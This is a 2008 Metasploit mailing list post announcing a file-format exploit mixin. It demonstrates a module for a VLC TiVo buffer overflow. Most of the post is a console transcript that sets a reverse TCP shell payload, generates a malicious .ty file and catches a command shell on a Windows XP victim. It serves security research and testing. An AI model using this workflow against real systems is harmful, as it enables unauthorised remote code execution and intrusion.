Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

fileformat exploits.

From: mc at metasploit.com (MC)
Date: Tue, 2 Dec 2008 20:33:56 -0500 (EST)
Just added a small mixin and example exploit that may assist for file 
format based bugs. quick demo:

msf > resource /tmp/fileformat_test
resource> use exploit/windows/fileformat/videolan_tivo
resource> info

       Name: VideoLAN VLC TiVo Buffer Overflow
    Version: $Revision:$
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)

Provided by:
  MC <y0 at w00t-shell.net>

Available targets:
  Id  Name
  --  ----
  0   VideoLAN VLC 0.9.4 (XP SP3 English)
  1   VideoLAN VLC 0.9.2 (XP SP3 English)

Basic options:
  Name        Current Setting   Required  Description
  ----        ---------------   --------  -----------
  FILENAME    msf.ty            no        The file name.
  OUTPUTPATH  ./data/exploits/  no        The location of the file.

Payload information:
  Space: 550
  Avoid: 1 characters

Description:
  This module exploits a buffer overflow in VideoLAN VLC 0.9.4. By
  creating a malicious TY file, a remote attacker could overflow a
  buffer and execute arbitrary code.

References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4654
  http://www.securityfocus.com/bid/31813

resource> set TARGET 1
TARGET => 1
resource> set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
resource> set LHOST 172.10.1.100
LHOST => 172.10.1.100
resource> set LPORT 1975
LPORT => 1975
resource> exploit

[*] Handler binding to LHOST 172.10.1.100
[*] Started reverse handler
[*] Creating 'msf.ty' file ...
[*] File 'msf.ty' is located in './data/exploits/' ...
[*] Exploit completed, but no session was created.
msf exploit(videolan_tivo) > resource /tmp/recieve
resource> use exploit/multi/handler
resource> set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
resource> set LHOST 172.10.1.100
LHOST => 172.10.1.100
resource> set LPORT 1975
LPORT => 1975
resource> exploit

[*] Handler binding to LHOST 172.10.1.100
[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (172.10.1.100:1975 -> 
172.10.1.104:1055)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\VideoLAN\VLC>

...the same module exist in modules/exploits/windows/misc/ that can be 
used via network based attacks.
-- 
~ mc
Previous By Date Next
Previous By Thread Next

Current thread: